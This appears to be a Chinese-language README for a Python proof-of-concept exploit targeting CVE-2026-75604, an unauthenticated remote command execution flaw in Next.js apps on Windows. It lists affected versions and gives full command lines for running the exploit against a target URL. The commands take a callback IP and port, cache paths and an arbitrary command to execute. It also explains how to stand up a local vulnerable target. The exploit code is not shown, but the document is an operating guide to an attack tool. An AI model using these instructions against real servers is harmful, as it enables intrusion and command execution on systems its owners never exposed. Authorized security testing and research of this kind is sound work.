针对 CVE-2026-75604 的 Python 概念验证,该漏洞是 Windows 主机上同时使用 Pages Router 和 App Router(未启用 Cache Components)的 Next.js 应用中的未认证远程命令执行漏洞。

>=13.4 <15.5.24 或 >=16.0 <16.3.3已在 [email protected] 上验证通过。
python -m pip install -r requirements.txt
python poc.py --target http://TARGET:3000 --callback-ip CALLBACK_IP --pages-cache-path /PATH/TO/PAGES_ISR_INSTANCE --app-cache-path /PATH/TO/APP_CACHE_INSTANCE
Server Action 路径默认为 /。当其表单包含多个字段时,请使用 --action-field。
必需参数:
--target URL:Next.js 应用的基础 URL--callback-ip ADDRESS:目标可访问的 IPv4 地址--pages-cache-path PATH:现有的动态 Pages Router ISR 页面--app-cache-path PATH:由文件系统缓存支持的现有动态 App Router 页面可选参数:
--command COMMAND:要执行的命令;默认为 whoami--action-path PATH:包含兼容 Server Action 的 App Router 页面;默认为 /--action-field NAME:action 消费的表单字段;在无歧义时自动检测--callback-port PORT:回调端口;默认为 4331--listen-address ADDRESS:本地回调绑定地址;默认为 0.0.0.0--timeout SECONDS:请求和回调超时时间;默认为 20--insecure:禁用 TLS 证书验证可选的 target/ 应用固定使用 [email protected],并采用标准 Next.js 生产服务器:
cd target
npm ci
npm run build
npm start
在另一个终端中运行 PoC:
python poc.py --target http://127.0.0.1:4330 --callback-ip 127.0.0.1 --pages-cache-path /pages-cache/seed --app-cache-path /app-cache/seed
可选目标提供了所需的路由以及位于 / 的兼容 Server Action。
本 PoC 仅供教育目的、安全研究和授权测试使用。请仅在您拥有或已获得明确测试许可的系统上使用。
感谢 evolutionstorm。
本 PoC 是根据公开公告和 Next.js 补丁 独立重建的。